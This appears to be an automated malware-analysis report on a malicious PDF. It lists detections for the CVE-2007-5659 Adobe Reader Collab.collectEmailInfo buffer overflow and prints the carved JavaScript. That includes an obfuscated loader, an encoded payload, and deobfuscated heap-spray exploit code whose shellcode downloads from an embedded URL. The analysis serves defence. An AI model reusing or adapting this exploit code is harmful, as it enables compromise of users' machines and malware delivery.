MALICIOUS
350
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATEPDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.Matched line in script
var t8T_db = new Array();var P_A_sns7 = 0;var I_7__Q5Uh5V_JWh = "";function pXb_Lr(x1C5J__Mo, p35quI_eLPV_2sj){var y58ror05O = p35quI_eLPV_2sj.toString();var oN4_g6QJJJW_8E = "";for(var KL_t_20__CE = 0; KL_t_20__CE < y58ror05O.length; KL_t_20__CE++) {var Fuo7aRm = parseInt(y58ror05O.substr(KL_t_20__CE, 1));if (!isNaN(Fuo7aRm)) {Fuo7aRm = Fuo7aRm.toString(16);if (Fuo7aRm.length == 1) { Fuo7aRm = "0" + Fuo7aRm; }else if (Fuo7aRm.length != 2) { Fuo7aRm = "00"; }oN4_g6QJJJW_8E = Fuo7aRm + oN4_g6QJJJ … -
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
z = y = app[h.replace(/[aviezjl]/g, '')]; var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s); s = ''; z = 1; -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
ClamAV: Pdf.Exploit.Agent-35905 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-35905
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://beancountercity.in/cgi-bin/uiq/eH198cf0b1V0100f060006R654a16cd102T778f0ba5203l0019 Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x19B | 352 bytes |
SHA-256: d8a6b4ad1abf04d0c4a4f89535cfb57f7312edef25c443f4e844c8ec9d0929dd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var z; var y;
var h = 'edvoazcl';
z = y = app[h.replace(/[aviezjl]/g, '')];
var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s);
s = ''; z = 1;
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2FE | 11824 bytes |
SHA-256: 53249077197e9c5ec7d533521ea65605fcec5d4a93cecfd453d7ceee18c734ee |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function QM15_Qn5L__7(Gv_5IF4_N_X6s48, BnkOR_1nfYU__2N){var j26__w6d_05g_M = arguments.callee;var Mmcy3NVe = 0;var R1N_4p_5g = 512;j26__w6d_05g_M = j26__w6d_05g_M.toString();try {if (app) {Mmcy3NVe = 3;Mmcy3NVe--;}} catch(e) { }var yaV8_MJ_Kf6ky4 = new Array();if (Gv_5IF4_N_X6s48) { yaV8_MJ_Kf6ky4 = Gv_5IF4_N_X6s48;} else {var N16G1_1Lw2r_i = 0;var x55u11_v8IVF = 0;var d2i_0_4b_D2V = 49;d2i_0_4b_D2V--;while(x55u11_v8IVF < j26__w6d_05g_M.length) {var u__F0Dr = 1;var D__614nw_Np = j26__w6d_05g_M.charCodeAt(x55u11_v8IVF);if (D__614nw_Np >= d2i_0_4b_D2V && D__614nw_Np <= (d2i_0_4b_D2V + 9)) {if (N16G1_1Lw2r_i == 4) { N16G1_1Lw2r_i = 0; }if (isNaN(yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i])) { yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] = 0; }yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] += D__614nw_Np;if (yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] > R1N_4p_5g) {yaV8_MJ_Kf6ky4[N16G1_1Lw2r_i] -= R1N_4p_5g;}N16G1_1Lw2r_i++;}x55u11_v8IVF++;}}N16G1_1Lw2r_i = 4;R1N_4p_5g = 256;while (N16G1_1Lw2r_i > 0) {var x55u11_v8IVF = N16G1_1Lw2r_i - 1;if (yaV8_MJ_Kf6ky4[x55u11_v8IVF] > R1N_4p_5g) {yaV8_MJ_Kf6ky4[x55u11_v8IVF] -= R1N_4p_5g;}N16G1_1Lw2r_i--;}var kG6B__k = 0;var xfT__15 = "";var W1h6wyh = 0;var u_Bk61yD_b_5oI7 = 0;var iw___26v4k_uRQ = 0;var Fl__2_G_8_r614g;var lyU_Al_hk_gV5 = 0;while(u_Bk61yD_b_5oI7 < BnkOR_1nfYU__2N.length) {var a_0_5X__k = BnkOR_1nfYU__2N.substr(u_Bk61yD_b_5oI7, 1) + "J";var AJs75vGFFcwX3 = parseInt(a_0_5X__k, 16);if (iw___26v4k_uRQ) {Fl__2_G_8_r614g += AJs75vGFFcwX3;if (kG6B__k == 4) {kG6B__k -= 4;}var B_35E_2_YG4Q_s = Fl__2_G_8_r614g;B_35E_2_YG4Q_s = B_35E_2_YG4Q_s - (lyU_Al_hk_gV5 + 2) * yaV8_MJ_Kf6ky4[kG6B__k];if (B_35E_2_YG4Q_s < 0) {var QF_T_jHE7538 = Math.floor(B_35E_2_YG4Q_s / 256);B_35E_2_YG4Q_s = B_35E_2_YG4Q_s - QF_T_jHE7538 * 256;}B_35E_2_YG4Q_s = String.fromCharCode(B_35E_2_YG4Q_s);if (Mmcy3NVe == 1) {xfT__15 += AJs75vGFFcwX3;} else if (Mmcy3NVe == 2) {xfT__15 += B_35E_2_YG4Q_s;} else {xfT__15 += u_Bk61yD_b_5oI7;}kG6B__k++;lyU_Al_hk_gV5++;iw___26v4k_uRQ = 0;} else {Fl__2_G_8_r614g = AJs75vGFFcwX3 * 16;iw___26v4k_uRQ = 1;}u_Bk61yD_b_5oI7++;}eval(xfT__15);return 0;}
QM15_Qn5L__7(0, "78AA3E267A8DEC9D6EC384B32EDB952532BA6E5877FEF0475507F5C83EEDBFCF811C9A395DD5351E5AFC3A97A0EDD9CD6938BBF76B3A901390503E6DA61DFD6E642BC7ECBB83BB32B3909216BE85528D9EABE4DE8788BDE8B9B0A1458A7D904197DA618FC5DA04CEC0E0B629D8B6CB64D30B3C9FABDD5ACDECE1E9E59EFAA03EB5FEBD7BCF347D8ADA3743A80157DE22014CF058FF73AF46C34C8AB7103D4FDCD68813FCF77FC24801A07C7BCE8A3090D4944215288D1E3F2C91BF621DF19F80F2E86BC90BB515DEFADCC4411A0CE48D04E99BC5190A28DAFA4A090E504C123E17389AB24B639FF2523C24013A6C444D2449FB85396A93892351AF0C5FAF201477B8036758C2B87B2AD1C5E881D2791C86A1751B4EF737904AC6E3849112C201961B541172146C5D5CF123957112BC8E630285E19F4B48065B5A67649F4BE894B778C3E7988281E76A9C6A6BBD645180BF59F9869CBAF7D5BBA3C104D2CC7382D4D25AAD8EA6EEA7A5EAEAD696D3C55DA9FA6E93A4114DCCE1251CB6BBFAA0FFABE9C726CC4A8775EB335196CB0DD2DEB419A706DC7AB755FB638191BE9A45FA158ECC2F0C55A0441FB07B9700BA3EDA17C7431A1E85C91BDAA39D36399D86C331C06DD833B515DEECD1D41809CDED9D20ED9BCD0C1652E82428330E23FDDD2E285EDB7D4747A59E15217304226C37244363E6704D84A0A335AEB10D66A66C332AB81A3A65BCCE8F54ABAECD6DA575DC7EDE6A4D8AEDE85A3AC9BD7699BDCFDC560893FC77FF42488120FC7B4E0AB09062FB7CD15654761299582A6788470AA5A141D1C16692CE1FBC41732BC05E42937276DCDE8788BDE8B9B0A1458CD18F61D6DB55B4CD9DE9B493BCED1C8EB59F23E4CA6E8BA4114DCCE1251CB6BBFAA0FFABE9C726D50A8A6FDC4604B3AE0FE0D0B2249C35CB777970FF4C34D3038953F3C29212E6CE84AD70DB93A9641AB27ED526C1FCC7F385DA07DAEC9465F3EF71A027A949A6E8C508E005C121651CE1CF95080A86B0201C67D61FF111F60010C22E0D09BB7B58268AE30A2C24D83E2FF0191288EA5A558C9EAF447B7EED5D75450974AE407B78C3B8AD5895C3DD44BE7AF85CD05B1E5BC045848FFFF7CA870CCEAE670899F87B184763990DEC7C5F25DDA26210A71B6205770F9B25275C8D263BC4A37BACF47D66C2098C6844336E9B55A5727A2ED8B7BEB0C07C7A8F4CBFCF406399CA227BA7E317DDD2F8DDEB8ECA7034A3F1695AA6DC33D3B52715089E13C62DF528AF5BFF1081A4AA090CCCD44C230DF54EF506D3258E4FF25E4886D56855BC0E8A1F3AEFA3DC632290AA5ED072859EE27B05CFD686E5FEE7A29D3639E6A66EEADF52E539F43B1343C1CF1604CDAD6BF2FF6DBE23F938D525460242434B07824A128CC1542C89E835434B111E6AF02B125FCD7E4359989545A66209739F73427471224C65C8F7A15FDA84A12EA15CCE44A2373B4DE6FE535BFFF3B58614B9C342E64C0C570D45325AF80FAB5C4005D0A54DCE0FA44C500E66114A5C9D701FB19782B5C1C392AE04A9948359A3A6106B726AF7CCC5B7A8C6A59DB34ABD8F506DC1AC3166A395E8B98ACCD015E2EC821ED1F85F6B96E108ADAB12E8C9C40CAE3AE737B37AEE103889D64058D5C01D0F0DD53EA711BF25C394FB83349AFD7C2B06D85B0B2FDBAA983BCA907597E28056BDE0BC440728A817421FB2E83E09C99FC221BB3CE525D81DE7F8151349421FD99C39E16D9CFF007104FAF918353D2818441448D57B5B23A4E35868781E0E4A0D0E2342BCA11669C7BD45A96AC85DA635432286EC283677B8692AA5C3D559E566E071E2315B51A5458C51E2FEA160E4BBE468089F25890A715B4AFEE47A8D2CDBE6680BBB0F6B5A633480506775A15239796D4409D19274CC1D7C5183559172106B72A7F3B7C090CAE5B581B104CAC28E75D6D10C8586A5D8B88AB2BF24A5DEBA39B4E0777CBC045BBDDD062DF39EFAA0F0B2F96E41F40C69A8D5232BD1E4330F21F15CD15FB630684FF7315176C04D10B0DD7FF2251994DB5323616F73CE7F4BD7187904CE249CF94805B3BB442AE2AEB536F12CB3E6E0241D3E00D6262D0CB373FBD9618608EE281948082540291FE769382FCBB945588DF7472141D6103D00102D96138E5F91CD86457D930A5D6F302D618C1126427506755BCBAFB8559B9C1380E0704E3FA5437351F2CA8B5F0BBFED8A2085FB46E0351E4CE639584EF8B0DC692AC6F1782C832986506875702D1FAD854EACB16646B5DE7541922D9F973B70999407B2B5B9E7D08AB0B319A3BA5B59AEC860A598A517DDADC6A4E1ABAD8229EFEE5387ACDA29CCD9101C0DD7F2A0F9BFE96E2BFB05486EBA031FE8F36125200019D11DF73B7D5F087073BE157615C91F8F213409A9E16D18618C8DE2A564B716B828CEFDC7D90EFCA4AB67FFA960B12FD140E508C82BF42900EA6714E599A94921A5D23BE530E53C0204181114F14F1055D1B44D69A0A81C3D672336412F30256CD285556BD9A4325A5411459F31FE447C03574775C37B2AA8C6A73EAF63E563BA37635DE7F94E5CC4CBA75FBD9DAE690B5DF668E82F4F6BEF37AB904004E09B47C3CE66118B4B822553587150F6ADA14FFDCC7E448AE78593896AC39F5E4E999BED969878BFEF9B8CD13CD3CB8382CBD85A66D3BEF0B3D8E0F50A9EF3784FA4FF7D6DBADD2CCEA6D108F5DD1CE900AEE9A565FF4585A5BE2617D5F3162B24F36B9C5AD964AA63F962738DFD4D23FBC266CCF61E65DB2E0D71A766118886CF24792308E795EA11F1C2B536FB9DB5BC27FC6FE736FA00122900035F00D6ABA4332B5CB507263CD12020F413FE4DF8704135DE6E47279EDF31453CFA5E39F04751920C935D59AD9159965DD1749E72EE70A822383888018C6F81A19683DB952175DA6C4B3EA7ED9353C1CD86431299BE5BD9513B5FE5312E4F36F667932FB5E3941191DF5B5A610E6F21198B772DF57E677EC2E77B467D337D548A5C73A22662B69BE1DB8878C0D77FC6840894BE45839ACB217F8BEA1EB1D0E3A92BA5C2B154970E828CA6DC0DD3B0E719CDA332E330BAFA717BB63B7EA4AF5649D8C220D523F731E14ABB7AAE84FE7239CB048346F4C79EDC29DC969D73E2A3796FD3C240D1E28D011B189D0A0FDFE6A44AF6B065C3F2BF3CBEEB0A10F1FFD9C96BFFDDD362F72E6F990BF52D133D0437060006DB84435B8C8C174D85B21A384F2B0E4AF010178ED5562B558DD3336169C623B239FE3779F17B3F85CD6E2C818F963092A5E742B22C0B8BBEF8574AB6098F4ED690B397E25CFF56DA6D375AFAF45BA3FDC0D36AFED1D666155803AF5656466E2235B37B39BCABBB458824AD4699267E5D2053C76FF09BBC6AFDD18AB285FBD38D503E928E617D9EA5E8A3DFB9E6E6D1B2C51ED5CD4C4BEBDC1896DCD629F7E2EEE3F3F7FF843EE8FA8DA3EC111C9B032512DECB1EF119CA3978430F45448E024255C604600FEB1B68DB34E266B99CE5857293278910DC178A1D43F2A6AD3B33AD708628AE81B6F6C508E33F07DD5B00D2E56438EF748B4BF538D43FF6490C160DD03357209E7D1B1AADB44E3767DB63733623263E115E58569E836F966CFB366275FE3280052B7B85C86E3A86D9DA45A592D387B12C1A4DAA3D4E4AC4FA7B9303C1C557CEA1FB5DE92F239FF9F46A65F2059E620CC2CBAB4B89156F16697BA4352273B73CBFBBAC3ACDF67B845D1BC35D2493B55E31968675B9C3CF89B6068E82954393CD4F6BDBAAEBB39CA6F9E6A2C38813E7C94C56A7CA5DC4E0E1E4BBF3EDE303B8EEC13BBF0A7963FF1616ABBF1225DEC431DE0B0B397B53CD368989005510B31760E1F6D65AED36DBA7A55B23B373A5147E51DCEB970D032FA7A94DF6A2B57EF5C041AB3BFA3AF6FDC6192E07DDA853471C739609EA7DCE0E0507FB5313D540470EE17C1B2C70A35F3537192432451E2249D44B6B5DC9935C56A9C632A031F377810439367A0D6E3A95999B83D060E1459E711B46BAF8438FC6CB8B51C2D5F488DE5CEB9BE6283360E6399C6605C393A71091D6660A9D149B212A3BB332F37E732E01BB7C7BBEE3BF56852682526566856EF58BCB75BC018C76C90E8E915133D7991C79C79A2DE09EB8B9DBE3C28654D8BE915BA7D52083EFE916CBB4E2F501E500812BFB0C4C76EC0659ADC61F15D3075FB116C92ABD56FC464A7B134F10C5D84E212CDB65AB231FA47D69E17285A2E38D15CB2B95DB3F1E96E949F1E0757337B972EA28BA4DEFFA03091B4311A66133DEB1960EFC3CC34F3436390F02153E1519D06B5B2968E24B26791C1F723213674A0259584ADDC3316869BB73756203676E41383A8AFD637FC5C8A64192A5E674AF320B8BB92A4E7DB6098B83D5C2B397D95FF789DA6D368C25285BA305F29E66FED1096B155B03AF265977A02235B1753EC5ABBB7BBE238246995CB4935553C77121CCBC6AFDCEBF85B9FBD3965873C58E617EC7DB1DA3DFB8E9E6D3B2C553A4FD544BEBD81B95ADD629CEDF20E1F3F7FC823BE8FA8D70F012459B032311E5C21EF11CC83C7A430F41448AD24255C5D65FE4EB1B6CA835DE66B96814807193278F0ED81C8A1D14EBA7A93B33B3738427AE81BDFBCB3EE33FD8D82C33D2E56504EF718B4BFB41D40DF6490D1714D433571FA5784B1AADB0503769DB63430724253E11585A5BA1836F676DCC30627500687F312B7B8BD1753F86D9A874A461D387AD341C4BAA3D5153C4C57B93D393C15ACEA1F956EB2E239FF4F56C60F205A1620E92CBAB1858116B16694C7430F073B73CC2B9763ACDF17A54541BC3602661825E31998C7ABAC3CF84880993829541939F1D6BDBABEBB1A0A6F9E99FC38413E7CC4E59A6CA5D91B1E6E8BBF3F0B801B9EEC139B60B4E63FF1715ACC01225E1C42CB10B0B387B51CA368989CE5343B3175CDDF9D65AED2EDA747D58E9AE80DEE0BC10F4ECC407110EBD9453DEF2AEB335EC6DF62BBD1D1D37D3F9591D12DF7AFAFF6DBE23F938D5254600F62D0E0142152FBB6F0F30AEDF5C21502A25822F4D2478CC5A2D45A57E2AA968C62E6D30FE3DBF2D7826C10A9469D195DE5C8D6DCE80D8521848B8316C7FBF00BB8C04D4F642D34CF8612B59704A24317E622CD2A1850FBB057C566E165A2E1462B23435ADA13BEBB67A4C78EB6A499068A48C605FBA87E796CE78C0C79598B6078E9F5345B3AA0C8386BD0FB2C2D5CD1ACDD97835D4CA4C68A9DC399FA6D11703C6F1DF10B51C8265E51B8984C20A1FECEF5FD0F7C358DB4FC93BA755DF74738E043D1DAECA9DEF25087AD74F0978A366F1BA309BD28954DAE695D80EEA9AA36232B4B5AD21BB6BB6FACC13243913C41E440EE24E29ECB59928F758ED2A21F413FE0DDB2E391CE579382788CD3A5124F20E56014D5182CF5C555CADC159699AD11E943347359BFE5655A5E869358A84F182A5840D76DB573D49FEFB704CE1E3A66EFA80CB42F08EF756F72B357B02E4614E3BEFC4640B8F0F844A635BB7576984A17129BDB029F9D57E74C20981594C1FC9A351A072A40BC8BE76BC0CCA92A3F69B7D42309DCF5BB8869D03CAC9F5E3E89EECAF31B7B95946A6E008A9C61028F5B0EDDF2DC50E6C42A6064A79AA2C30D5024CE2DEF158BF2BC130713E157C63B8064E14FC126AFBE6D172987318A6B7990FBD7596D47E51D619950B032FA1D746219F69893FFF6DF8E6F8371D29D3D63F2DF9A56631125CA3F6E72AD9404046F60628EC6D56489E7645547BC30A3E24E6292D1B3A518DFB582684C7A13F5170B635723009229418657AB4CA6E69C0A7BB399859CE8DDC5B4575B7FA6779DDC98E7DF680B95FC99715881D293298310585694A04D69B4C8A09A551943F9C446885B062E08B624CFBF2B276BAECAD909062B3906473BF9A25D29FB3EE0D82CCC74BC0C75A2E848B1866D3E81FB88AE4E315CDBF8237D1E5515ED5FE6587B5122406AC20EC33E33BA06FF33A67B3FE0934D5CF4C231C0530A521136BBD8CFD857DC50C3D3907EA88172C059CAC51D2948581F18575972DCF3D18D6D5074301B5DD75F5E7608BE2D96BC72508463101DC0D5CEED5988113047F9E3BE546DBFA09F4FC04FDF34F2D2CA4AB063158B6183235DF0E894C0E455AE7692E8A889A1A6862C7275D7B3B4B81017465C6EC6E708996A93A8D52D387A95F1679AA3D4E7DC1F7784ABDB3CF6DEC642B4FF0654D62202E816505B8976D567C0F9C05504E99563B5AA75CF7B86B2907E7B6858621B6868568A2965D93A1AE308EC6A4EDE59EBAB30DC8865B8BDFDF4DB886CE17F7DAEEEBEAB3C0AF5392D63C56B11B49D09A05F6C7CF2EDF44E1406C43A63688AEB85150EBF5361E21CD5FEB58B62DBE7F0C3165BFFD6F31D9018ACC03C665B31EFBAAA388FF986FCFD295FCFAF896F94F19E7D38DECE9A5BC29FD74C1E6E6411D1CF2EF552FD89B57F234B2C748E551FD24303706123CF97F1609A9663A3769CF5B607A1565682157516BED715586C58C7096A60967AC6E096BAFEC2E4FB4E29D6D9198D567DE64CE509955458FF535854ED6C7B583C6800942028B3F96225F326FF4239B4E0AB0B79123BB0966198737AB252F36BB7A29B46231EDF6B643CE27AF988968A49262A1BBA82A869382A8D7888284097E83462EBBC865B6D3DCECC39DE0E9D6AAAD891CA3CC4546F1FE47D7EA1E1BCAC3F0DF33A2066C3FB4064B79074254E6BC510F000758AC19EC3AA163EF704B76DB3D3907EA88172C059CAC51E591A3770DC07EE1E97919C617D5180C2DD6E86A27EAA59D37FD34A8270548EC2E00F66B2DDDA384071281BB35FC30C0FAFCF42F3D56107B491DB179455A66F259547828577B37161B39C746184E8A8A1A6664BF39");
|
|||
legacy_pdfkit_stage_001.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x2FE | 4861 bytes |
SHA-256: b9942434aa3479656d839f504b01e7fb119ea2885e5a07483e1141e39b4f1cf4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var t8T_db = new Array();var P_A_sns7 = 0;var I_7__Q5Uh5V_JWh = "";function pXb_Lr(x1C5J__Mo, p35quI_eLPV_2sj){var y58ror05O = p35quI_eLPV_2sj.toString();var oN4_g6QJJJW_8E = "";for(var KL_t_20__CE = 0; KL_t_20__CE < y58ror05O.length; KL_t_20__CE++) {var Fuo7aRm = parseInt(y58ror05O.substr(KL_t_20__CE, 1));if (!isNaN(Fuo7aRm)) {Fuo7aRm = Fuo7aRm.toString(16);if (Fuo7aRm.length == 1) { Fuo7aRm = "0" + Fuo7aRm; }else if (Fuo7aRm.length != 2) { Fuo7aRm = "00"; }oN4_g6QJJJW_8E = Fuo7aRm + oN4_g6QJJJW_8E;}}while(oN4_g6QJJJW_8E.length < 8) { oN4_g6QJJJW_8E = "0" + oN4_g6QJJJW_8E; }var O5r1Re = x1C5J__Mo.toString(16);if (O5r1Re.length == 1) { O5r1Re = "0" + O5r1Re; }else if (O5r1Re.length != 2) { O5r1Re = "00"; }oN4_g6QJJJW_8E = "3" + O5r1Re + "P" + oN4_g6QJJJW_8E;return oN4_g6QJJJW_8E;}function E_m2UcOeoL(F1XM407Ku, O1a43FO){var n7QjKBG = new Array("");var U7a65An__hwY5 = F1XM407Ku;var VF_s_cUy;if ((VF_s_cUy = F1XM407Ku.lastIndexOf("%u00")) != -1) {if (VF_s_cUy + 6 == F1XM407Ku.length) {n7QjKBG[0] = F1XM407Ku.substr(VF_s_cUy + 4, 2);U7a65An__hwY5 = F1XM407Ku.substring(0, VF_s_cUy);}}VF_s_cUy = 1;for (KL_t_20__CE = 0; KL_t_20__CE < O1a43FO.length; KL_t_20__CE++) {var D__Kx62_i5u = O1a43FO.charCodeAt(KL_t_20__CE).toString(16);if (D__Kx62_i5u.length == 1) { D__Kx62_i5u = "0" + D__Kx62_i5u; }n7QjKBG[VF_s_cUy] = D__Kx62_i5u;VF_s_cUy++;}KL_t_20__CE = n7QjKBG[0].length ? 0 : 1;n7QjKBG[VF_s_cUy] = "00";n7QjKBG[VF_s_cUy + 1] = "00";VF_s_cUy += 2;if ((n7QjKBG.length - KL_t_20__CE) % 2) {n7QjKBG[VF_s_cUy] = "00";}while(KL_t_20__CE < n7QjKBG.length) {U7a65An__hwY5 += "%u" + n7QjKBG[KL_t_20__CE + 1] + n7QjKBG[KL_t_20__CE];KL_t_20__CE += 2;}U7a65An__hwY5 += "%u0000";return U7a65An__hwY5;}function HW4XTId_L(Gb10B37QA, cmH4_B3S6__FqF8){while (Gb10B37QA.length*2<cmH4_B3S6__FqF8) {Gb10B37QA += Gb10B37QA;}Gb10B37QA = Gb10B37QA.substring(0,cmH4_B3S6__FqF8/2);return Gb10B37QA;}function mI85n_qT0f(a2faGD8Dp, T___i2, Y_ypmg4E3_e){var tC_bE_Q_7_0Cm = 0x0c0c0c0c;var Gb10B37QA = unescape(T___i2);var O1a43FO = pXb_Lr(a2faGD8Dp, Y_ypmg4E3_e);var n_V223iNe = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var F1XM407Ku = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6a70%u6272%u0044%u7468%u7074%u2f3a%u622f%u6165%u636e%u756f%u746e%u7265%u6963%u7974%u692e%u2f6e%u6763%u2d69%u6962%u2f6e%u6975%u2f71%u4865%u3931%u6338%u3066%u3162%u3056%u3031%u6630%u3630%u3030%u3630%u3652%u3435%u3161%u6336%u3164%u3230%u3754%u3837%u3066%u6162%u3235%u3330%u306c%u3130%u0039";app.c4N6__3TL = unescape(E_m2UcOeoL(F1XM407Ku, O1a43FO));var Lt7u__2_047 = 0x400000;var lrV_p1hN = n_V223iNe.length * 2;var cmH4_B3S6__FqF8 = Lt7u__2_047 - (lrV_p1hN+0x38);Gb10B37QA = HW4XTId_L(Gb10B37QA, cmH4_B3S6__FqF8);var I1__i36_7Ec_8f = (tC_bE_Q_7_0Cm - 0x400000)/Lt7u__2_047;for (var W3y3R2POPP = 0; W3y3R2POPP < I1__i36_7Ec_8f; W3y3R2POPP++) {t8T_db[W3y3R2POPP] = Gb10B37QA + n_V223iNe;}}function mO8_jK78(){var kObh14npAO = "";for (KL_t_20__CE = 0; KL_t_20__CE < 12; KL_t_20__CE++) {kObh14npAO += unescape("%u0c0c%u0c0c");}var c___22I_L58_Y = "";for (KL_t_20__CE = 0; KL_t_20__CE < 750; KL_t_20__CE++) {c___22I_L58_Y += kObh14npAO;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: c___22I_L58_Y});app.clearTimeOut(P_A_sns7);}function YyH_kf_g4S(SAKC8e){var p_eGDi_7j = P_A_sns7;if ((SAKC8e >= 8 && SAKC8e < 8.11) || SAKC8e < 7.1) {mI85n_qT0f(23, "%u0c0c%u0c0c", SAKC8e);mO8_jK78();} if (p_eGDi_7j) {app.clearTimeOut(p_eGDi_7j);}}var Y_ypmg4E3_e = 0;var TB1Qq_v_w = app.plugIns;for (var Qi_RQK_a = 0; Qi_RQK_a < TB1Qq_v_w.length; Qi_RQK_a++) {var I_J_c04_Yq4 = TB1Qq_v_w[Qi_RQK_a].version;if (I_J_c04_Yq4 > Y_ypmg4E3_e) { Y_ypmg4E3_e = I_J_c04_Yq4; }}if (app.viewerVersion == 9.103 && Y_ypmg4E3_e < 9.13) {Y_ypmg4E3_e = 9.13;}app.d_Ru_03V5YEU_7 = YyH_kf_g4S;P_A_sns7 = app.setTimeOut("app.d_Ru_03V5YEU_7(" + Y_ypmg4E3_e.toString() + ")", 50);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.